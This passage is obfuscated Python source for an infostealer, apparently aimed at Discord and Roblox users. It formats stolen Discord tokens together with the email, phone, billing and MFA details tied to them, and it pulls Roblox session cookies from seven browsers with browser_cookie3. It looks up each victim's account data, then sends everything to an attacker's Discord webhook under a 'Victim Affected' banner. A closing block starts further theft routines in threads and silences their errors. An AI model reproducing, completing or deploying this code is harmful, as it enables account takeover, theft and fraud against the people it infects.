            if DYRTMLORYFSBOUXITBCDONGSQZMKVBBCODEVENQEUWPEFEAFWTYDVPGDUJURWQA:
                SJOARXQTYVCHMESUGUVUMSSEYSAYTJCEFYOGUNEDJXPLSDYBXDXBDAWEMICIMLXNE = []
                for DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW in DYRTMLORYFSBOUXITBCDONGSQZMKVBBCODEVENQEUWPEFEAFWTYDVPGDUJURWQA:
                    LKIASPQHAINGLNETMANPEOKIPKZBJHDIFCUEQUBCQVPFQAFFRN = DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW['promotion']['outbound_title']
                    DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW = DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW['code']
                    QRHSULWYSANPBCKBQWXJDEXSSTURQDSONILKGSPYNNOZANZGOLJXYTZCGBKQGQXVMEWLPZJPLDHABNDZFBMBSYTMUG = f"Gift: {LKIASPQHAINGLNETMANPEOKIPKZBJHDIFCUEQUBCQVPFQAFFRN}\nCode: {DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW}"
                    if len('\n\n'.join(DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW)) + len(QRHSULWYSANPBCKBQWXJDEXSSTURQDSONILKGSPYNNOZANZGOLJXYTZCGBKQGQXVMEWLPZJPLDHABNDZFBMBSYTMUG) >= 1024:
                        break
                    SJOARXQTYVCHMESUGUVUMSSEYSAYTJCEFYOGUNEDJXPLSDYBXDXBDAWEMICIMLXNE.append(QRHSULWYSANPBCKBQWXJDEXSSTURQDSONILKGSPYNNOZANZGOLJXYTZCGBKQGQXVMEWLPZJPLDHABNDZFBMBSYTMUG)
                if len(SJOARXQTYVCHMESUGUVUMSSEYSAYTJCEFYOGUNEDJXPLSDYBXDXBDAWEMICIMLXNE) > 0:
                    DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW = '\n\n'.join(SJOARXQTYVCHMESUGUVUMSSEYSAYTJCEFYOGUNEDJXPLSDYBXDXBDAWEMICIMLXNE)
                else:
                    DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW = "None"
            else:
                DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW = "None"
        except:
            DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW = "None"
    
        v4r_software_name, TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP = HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG.get(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA_d15c0rd, ("Unknown Software", "Unknown location"))

        embed = Embed(title=f'Discord Token {QVIYKROFTLKFBPREUAZQHMCURAYNUQLAMCJOGJNSLSGAGTEUZLHEPCUTCROBJNSCUIFGHYVDDYBZUBITWQNLQE}:', color=NGLUJYSJXZOTXXDBAKUVBVOXGCYNSIBRYEESZCKAOOEUXMORETHAJCCOQQFQLGRGC)      
        embed.add_field(name=":file_folder: Path:", value=f"```{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}```", inline=True)
        embed.add_field(name=":globe_with_meridians: Token:", value=f"```{PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA_d15c0rd}```", inline=True)
        embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{XIFMPYJUSPBDRNXOUXCCHIOMBIYXUEUAANSTSOURIBXBALIUEQOUUOMMAGZDMAJUIBLOEDQHPZCTFAQOZAIXOQCVMUXAU}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{ZCWNAKGWZIYZWBMDFVIEIFHOZNMXBNGAUUYIRGEWLZCXJUZDMUCAYZU}```", inline=True)
        embed.add_field(name=":robot: Id:", value=f"```{EUURNTBWOXDZCJKKJUTHIKKCPGYTQKJUJYVYSKVCTQFFDMDXNLMPBISSGKTFXTGCPWQNWKEIWGJSNJRWGGTCN}```", inline=True)
        embed.add_field(name=":e_mail: Email:", value=f"```{GIOBYQDPRIVZVOPUDKOAVNANCCQVTQCBCMDIKIYJVBUECKQYEMWONEFBTZZGGKMAWEVBLWOVGJZLNWLRTWLLLFRBJOS}```", inline=True)
        embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{TYYNMGCFLEZINVIWXODSKDYYUXXNUXRVDSOOAYEXXDSDOIWLKQHHXRZWQUXYYBTJMBFYSNGZCY}```", inline=True)
        embed.add_field(name=":telephone_receiver: Phone:", value=f"```{MZANKNAGVCPITTEGZBFTALSLTDPFZVOOOQCAPAQWGCNRXMVUIUVIPVKZWPCGAWAFACQTE}```", inline=True)   
        embed.add_field(name=":rocket: Nitro:", value=f"```{TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP}```", inline=True)
        embed.add_field(name=":earth_africa: Language:", value=f"```{ZNAXSQFKTHDWFKOIVOLKALAUWBCAPBOYQWAWIQGQKQNFFVDMBOP}```", inline=True)
        embed.add_field(name=":moneybag: Billing:", value=f"```{BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG}```", inline=True)
        embed.add_field(name=":gift: Gift Code:", value=f"```{DHHTADEVVFIIPWAIZVWBYFMRLHMHOTHQTYLNGBEENVRDVDZYBSITPFUJSGMFMQRIARRJLQW}```", inline=True)
        embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{YOSFDFTYTAHBUVRVCSVKPKDUKAPCMNDAOVOMTNERZEGEGPISED}```", inline=True)
        embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
        embed.set_image(url=PGJOOTBDFLUCFALQYKTBRJKQSRRBVKLWQYMRPYVITBZMARRWMAMDBOCCKRYHJKR)
        embed.set_footer(text=YMRAXQPHEMEVWZVXZRVGBBBTUJGIHKBIYOEBEXXJNDDCNGBTORDFJL, icon_url=QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI)
        BAOXNCLADSTXFZJUMQBWXIVRCTYSIPYGWAXKCLCMKLAXSKDADA.send(embed=embed, username=NFTJSAFNXOTVTSFOFZPFSWLFSRLVUVBXBDIMEBLWERLDQUMLTCLUWGWXRBTHSOOWGAHSUKLK, avatar_url=QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI)

def RTPSQJXDSDZJVLYWVHZVNSNFZAYEHVROPIEPRERVOVJYMGZYXMYYLRPDZJOZW():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook
    import discord

    JLLZSFRZCOVDZCPVLZBYXJMEQNDDYSCVMLWAOYJYHLRDTUPPLOPGLQUXYMJTILUZRKKROVYKCMNQUXXNYRM = []
    def IJLXCCUGMFLSACMASQRUSCCVLPREHTXSLMYVERGZQDCCZBZAUPTUJUNVNNNZTOVOLTQLBDQKERTZMTKLPOGODMFXUALBKBJ(ZMPYUWIFHYWMYWNNSMQIPUWEVACAAFOYRERYCKTKRAVNFCZDSONMHIIVBJ):
        try:
            WIMMZDSSGLZJXOBVWHHMWYXWDDLNWBPOBFLBGXEUAZNHFOBJXKHMVCEORVKARSAQDEIWPKFDZKLIVKGXLFRQV = ZMPYUWIFHYWMYWNNSMQIPUWEVACAAFOYRERYCKTKRAVNFCZDSONMHIIVBJ()
            WIMMZDSSGLZJXOBVWHHMWYXWDDLNWBPOBFLBGXEUAZNHFOBJXKHMVCEORVKARSAQDEIWPKFDZKLIVKGXLFRQV = str(WIMMZDSSGLZJXOBVWHHMWYXWDDLNWBPOBFLBGXEUAZNHFOBJXKHMVCEORVKARSAQDEIWPKFDZKLIVKGXLFRQV)
            GQAIXBHSXKROIQNTWWWGDOZIYHEOMXACIRLERUUPZWCTIYNREIJJCPVI = WIMMZDSSGLZJXOBVWHHMWYXWDDLNWBPOBFLBGXEUAZNHFOBJXKHMVCEORVKARSAQDEIWPKFDZKLIVKGXLFRQV.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            PBEEREQEBLOQSSAHKEQQFLNWPKMXWLXGWEGVCJBWBFGCHUYNTIO = ZMPYUWIFHYWMYWNNSMQIPUWEVACAAFOYRERYCKTKRAVNFCZDSONMHIIVBJ.__name__
            return GQAIXBHSXKROIQNTWWWGDOZIYHEOMXACIRLERUUPZWCTIYNREIJJCPVI, PBEEREQEBLOQSSAHKEQQFLNWPKMXWLXGWEGVCJBWBFGCHUYNTIO
        except:
            return None, None

    def ZQBKXZBKPQFANHVBYENTCRQGFYOUPAYDLTXKULWDSYEMVSZVVUWAVGBUBNPVSABRXELXMDNNABPIUXSUVLPRASASC():
        return browser_cookie3.edge(domain_name="roblox.com")

    def EEVJNUSUUHFMQKDYRXZBMZKREPCOEZOHMWMRAKFPXCZIMJEQWZZWXUGEVCLWSREP():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def MHPACMCCUNRWJMKGASRQPWOSFEUTPCJVIYADGNWKHCSQUYNPSJAUPREFYBIZDQGQCTXPHTNMUZPWFOVVOSUMJLVSQLJGVCBD():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def WKADTZYVVQIEHTGEYDKDSRNHMVNLHBPFIEKKSYMKQDZAZDSLBDDOFIOTX():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def WKADTZYVVQIEHTGEYDKDSRNHMVNLHBPFIEKKSYMKQDZAZDSLBDDOFIOTXGX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def KOXJTYOMXGQXWNMVPSTNGFAPHBINFXYHQEQADAFXVJWAUUJYBLGJIBEETTHHIWZOUEMPANVVBPLOCLKHPNFWAAJYX():
        return browser_cookie3.safari(domain_name="roblox.com")

    def MUGFFSNEMFBLEARYYPUIJRYHBZJRIHCTECIEQZQSWNVCXNPYMECBLMEDDJBFVBKOBITJQTNNWEOINTWPDOYMKKIVS():
        return browser_cookie3.brave(domain_name="roblox.com")

    SBIFUVJANTAVMLVJYSZZBAUOOFGKUTYBXFFFZLJYJEYYJXZQNQJQHBWXRUTEGUWLMC = [ZQBKXZBKPQFANHVBYENTCRQGFYOUPAYDLTXKULWDSYEMVSZVVUWAVGBUBNPVSABRXELXMDNNABPIUXSUVLPRASASC, EEVJNUSUUHFMQKDYRXZBMZKREPCOEZOHMWMRAKFPXCZIMJEQWZZWXUGEVCLWSREP, MHPACMCCUNRWJMKGASRQPWOSFEUTPCJVIYADGNWKHCSQUYNPSJAUPREFYBIZDQGQCTXPHTNMUZPWFOVVOSUMJLVSQLJGVCBD, WKADTZYVVQIEHTGEYDKDSRNHMVNLHBPFIEKKSYMKQDZAZDSLBDDOFIOTX, WKADTZYVVQIEHTGEYDKDSRNHMVNLHBPFIEKKSYMKQDZAZDSLBDDOFIOTXGX, KOXJTYOMXGQXWNMVPSTNGFAPHBINFXYHQEQADAFXVJWAUUJYBLGJIBEETTHHIWZOUEMPANVVBPLOCLKHPNFWAAJYX, MUGFFSNEMFBLEARYYPUIJRYHBZJRIHCTECIEQZQSWNVCXNPYMECBLMEDDJBFVBKOBITJQTNNWEOINTWPDOYMKKIVS]
    for v4r_br0ws3r in SBIFUVJANTAVMLVJYSZZBAUOOFGKUTYBXFFFZLJYJEYYJXZQNQJQHBWXRUTEGUWLMC:
        v4r_c00ki3, PBEEREQEBLOQSSAHKEQQFLNWPKMXWLXGWEGVCJBWBFGCHUYNTIO = IJLXCCUGMFLSACMASQRUSCCVLPREHTXSLMYVERGZQDCCZBZAUPTUJUNVNNNZTOVOLTQLBDQKERTZMTKLPOGODMFXUALBKBJ(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in JLLZSFRZCOVDZCPVLZBYXJMEQNDDYSCVMLWAOYJYHLRDTUPPLOPGLQUXYMJTILUZRKKROVYKCMNQUXXNYRM:
                JLLZSFRZCOVDZCPVLZBYXJMEQNDDYSCVMLWAOYJYHLRDTUPPLOPGLQUXYMJTILUZRKKROVYKCMNQUXXNYRM.append(v4r_c00ki3)
                try:
                    ZMKHFWIURZTJGGOXRNOBDOMFAPOPTCBYBYGSXMYBAYCXLRDEAFPNIZD = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX = json.loads(ZMKHFWIURZTJGGOXRNOBDOMFAPOPTCBYBYGSXMYBAYCXLRDEAFPNIZD.text)
                except:
                    pass

                HJIWXKYKUCRCHJMJVAGEAAJHCAJOXFIVSNCZQKAQAHKNBRALFARIZJGCPVYSCYUEZSDXIO = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('id', "None")
                DDWGCEHVUJFDWPJVPKRFRRUAJWRSLCERBJJQXMHQSKJZHXIAHYNKTE = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('displayName', "None")
                LINYHENJAKJHMUHIFHDXELDGJVPBFLBOCRHFPAFUURNLGXJTXS = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('name', "None")
                AXBECWEFQGOUGFTYPCWSXCOFKNSTLHDZILZLUMFYOBOMIYSNSDZXMQFRIJIYBUUZSKRIZUHXMYHVRAOEXUWMFROONVCSCGN = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get("RobuxBalance", "None")
                RZITIYKFCMFZTNTPIGGMAUJQBOHPCOWCZWUDKXJPJUIHKUORGCOPYQDWBQ = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get("IsPremium", "None")
                YLUSFDBJXRSAENWGKXDYMMNSPEGBSBRJUUCKDZWEUSUOUMTZLNIPZZDHOX = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get("ThumbnailUrl", "None")
                NSMMPVUNPFKDUODIAPOQCMNUXIHPWNHVYNBNMZWVKQQLGCZPXBJPFDYHAYJXWAKDBQHVDKCHQXPPHRHKJI = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get("IsAnyBuildersClubMember", "None")
        
                BRZHCVFQWWZSSXGMWEFMMSUFGLZUYLKSJKMIADGBOBJXMQRLBNPJNTCPOG = len(v4r_c00ki3)
                HGMVCTSMWPGOZIOULVBEYSSFYALZCNZHWLRTNBSXNFEXGIILMSXVNRUWE = BRZHCVFQWWZSSXGMWEFMMSUFGLZUYLKSJKMIADGBOBJXMQRLBNPJNTCPOG // 2
                TAOEGDELFLXKVODCKAXGHHVIVIADUMSFJPISFXNHELTIEOMYBEEGTSCXLJTRELUCJUBFSXACOGZEEPFAB = v4r_c00ki3[:HGMVCTSMWPGOZIOULVBEYSSFYALZCNZHWLRTNBSXNFEXGIILMSXVNRUWE]
                WRKEHEHYBEQBGNUNJPIVAZNGYRCITQHROKGAVNBYCABJZIYNANBSUDSQZTGVXSMMSYYRUZVMABLMIKVIPLIJV = v4r_c00ki3[HGMVCTSMWPGOZIOULVBEYSSFYALZCNZHWLRTNBSXNFEXGIILMSXVNRUWE:]

                BAOXNCLADSTXFZJUMQBWXIVRCTYSIPYGWAXKCLCMKLAXSKDADA = SyncWebhook.from_url(OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB)

                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH = discord.Embed(
                    title=f'Roblox Cookie {QVIYKROFTLKFBPREUAZQHMCURAYNUQLAMCJOGJNSLSGAGTEUZLHEPCUTCROBJNSCUIFGHYVDDYBZUBITWQNLQE}:',
                    color=NGLUJYSJXZOTXXDBAKUVBVOXGCYNSIBRYEESZCKAOOEUXMORETHAJCCOQQFQLGRGC
                )
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.set_footer(text=YMRAXQPHEMEVWZVXZRVGBBBTUJGIHKBIYOEBEXXJNDDCNGBTORDFJL, icon_url=QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.set_thumbnail(url=YLUSFDBJXRSAENWGKXDYMMNSPEGBSBRJUUCKDZWEUSUOUMTZLNIPZZDHOX)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":compass: Navigator:", value=f"```{PBEEREQEBLOQSSAHKEQQFLNWPKMXWLXGWEGVCJBWBFGCHUYNTIO}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":bust_in_silhouette: Username:", value=f"```{LINYHENJAKJHMUHIFHDXELDGJVPBFLBOCRHFPAFUURNLGXJTXS}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":bust_in_silhouette: DisplayName:", value=f"```{DDWGCEHVUJFDWPJVPKRFRRUAJWRSLCERBJJQXMHQSKJZHXIAHYNKTE}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":robot: Id:", value=f"```{HJIWXKYKUCRCHJMJVAGEAAJHCAJOXFIVSNCZQKAQAHKNBRALFARIZJGCPVYSCYUEZSDXIO}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":moneybag: Robux:", value=f"```{AXBECWEFQGOUGFTYPCWSXCOFKNSTLHDZILZLUMFYOBOMIYSNSDZXMQFRIJIYBUUZSKRIZUHXMYHVRAOEXUWMFROONVCSCGN}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":tickets: Premium:", value=f"```{RZITIYKFCMFZTNTPIGGMAUJQBOHPCOWCZWUDKXJPJUIHKUORGCOPYQDWBQ}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":construction_site: Builders Club:", value=f"```{NSMMPVUNPFKDUODIAPOQCMNUXIHPWNHVYNBNMZWVKQQLGCZPXBJPFDYHAYJXWAKDBQHVDKCHQXPPHRHKJI}```", inline=True)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":cookie: Cookie Part 1:", value=f"```{TAOEGDELFLXKVODCKAXGHHVIVIADUMSFJPISFXNHELTIEOMYBEEGTSCXLJTRELUCJUBFSXACOGZEEPFAB}```", inline=False)
                RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH.add_field(name=":cookie: Cookie Part 2:", value=f"```{WRKEHEHYBEQBGNUNJPIVAZNGYRCITQHROKGAVNBYCABJZIYNANBSUDSQZTGVXSMMSYYRUZVMABLMIKVIPLIJV}```", inline=False)

                BAOXNCLADSTXFZJUMQBWXIVRCTYSIPYGWAXKCLCMKLAXSKDADA.send(embed=RLWJTNVGLOEFUUAVOUFJWKSXOARMMUWTNMWASGSVGQNFZEGPJHXLUSTQBACYAXKMRVDWWGXWCZEPMGYQFZH, username=NFTJSAFNXOTVTSFOFZPFSWLFSRLVUVBXBDIMEBLWERLDQUMLTCLUWGWXRBTHSOOWGAHSUKLK,
                                avatar_url=QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI)
                
    if not JLLZSFRZCOVDZCPVLZBYXJMEQNDDYSCVMLWAOYJYHLRDTUPPLOPGLQUXYMJTILUZRKKROVYKCMNQUXXNYRM:
        ZMJOGKYVRCDXMCPWNDFFVAUMNXCTWCVTQUTVCDQEVJONOEGLAZXBRYTDQRICRMNNKKPYZZPYFGZSGDPLHWSLNNI(
            OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB, 
            title=f'Roblox Cookie {QVIYKROFTLKFBPREUAZQHMCURAYNUQLAMCJOGJNSLSGAGTEUZLHEPCUTCROBJNSCUIFGHYVDDYBZUBITWQNLQE}:', 
            description=f"No roblox cookie found."
        )

try: requests.post(OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': NFTJSAFNXOTVTSFOFZPFSWLFSRLVUVBXBDIMEBLWERLDQUMLTCLUWGWXRBTHSOOWGAHSUKLK, 'avatar_url': QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI,})
except: pass
try: threading.Thread(target=GJKMFMULAFUWOEYTLLJVMRQDIUEYPENTZAJQRXGWAYRCYSPVBDNSLHMXYOTYIFATJNBZWEXQVPCJXCEACODBFUBVEFT).start()
except: pass
try: threading.Thread(target=ATZNNITFXXZOHEHTRGUWBOXYSAAXAOCAIYXVHKSDBIUSEILWTIECP).start()
except: pass
try: threading.Thread(target=TBVTQIOJGPBIDXODNLCGHKROTXSNHZWUVMVFWAYVHBCLTQVGCGIAPLPBRQKWQCZIGHVTRFNQZGIGFSLSAK).start()
except: pass
try: threading.Thread(target=SPKNSYVZRSPBPXBVAAHDTFMXCJQTCIPXGFKRZZWKNFGOIXQJNDCQRBSBWJVVPKVICJFNLY).start()
except: pass
try: WMPERYZYVRBUBAYIFSGLPZTRISGTXVDEAPYAPINQFYAXYGJXHBIHOQNSMWVJEOMWZYNQ()
except: pass
try: KJLUTYDKIZRJOFZUIKGAAVHYOUUMLRKRIFFUDVIOBCOFMKBCAUACSJASWBHXJURQQJNTRRXLPZAVRAGOKIJOSXOGP()
except: pass
try: EKRSOZGHIFUTBWWFDBUCBHZBQKJVZBEHRNENWGOGEBJMIMBOJSFFVSDVBVDXCGUNOXDZUSFOGUKILIYHQBNYAMKPODHYNRTRCP()
except: pass
try: XQPIZMYGVAAJBXNSDCHFLHMPSANTERBTKZPUBDBTPYOJZAQQDVDSYZNMRDWYTEDEXOCEZNGI()
except: pass
try: RTPSQJXDSDZJVLYWVHZVNSNFZAYEHVROPIEPRERVOVJYMGZYXMYYLRPDZJOZW()
except: pass
try: EXLXTNBHLQBSRPTPAWSVWLZUYXJXEVCKIMHNWGYJZAJYIBWHSRDJJFFIEZMCGZEMFMIJQ()
except: pass
try: BUSCFSXEFLTBAPOUDVNFGYTNFHRZVZSPERTDCCRUYITLMGOODFBWGODLGOYTJHZGPSBFSTICBWUFSKMRIJZBHSZTU()
except: pass
try: BBJYOXOYPSAHEVJRBIPNFWRNCIKBUCVMLJVRBMJEDZASIKBMYCHEIHEVTXCGFTLLOGODICPYQSJPNOZS()
except: pass
try: requests.post(OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB, json={'content': f'****╚══════════════════{NVBPSFFJDXXVRGXULOVZAYNIRFDRVYWSKRCVWOTBPWHKZJCQKOU}══════════════════╝****', 'username': NFTJSAFNXOTVTSFOFZPFSWLFSRLVUVBXBDIMEBLWERLDQUMLTCLUWGWXRBTHSOOWGAHSUKLK, 'avatar_url': QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI})
except: pass
try: threading.Thread(target=CMICFRXCJFQURMMYCXOHTQIXMWILFGJHPDIKJOBKOBJHGCUADDFODJTWNLDPCZJIIQTJSSLFJXAPRSPWTA).start()
except: pass
try: threading.Thread(target=HMOAUSKRVAUNSPBAHDOXLPQECODDNDUNTCHMSLKZAGXODFPZRGO).start()
except: pass
try: threading.Thread(target=CWHKTIAHMKRTQNRVCQLBXQMFDUASRGRWWCXCKOXWJDOSOPIJOPFGMQZCOU).start()
except: pass
try: threading.Thread(target=BYXZULZGZMRXLQXXNPWBJSATVLOWZNXFTCSRVNBEQHTVQFZUNPJSTXBBQGYIHORISABBHHDQDRMMRGUZDEJWOHKMLQMYPWYRTX).start()
except: pass
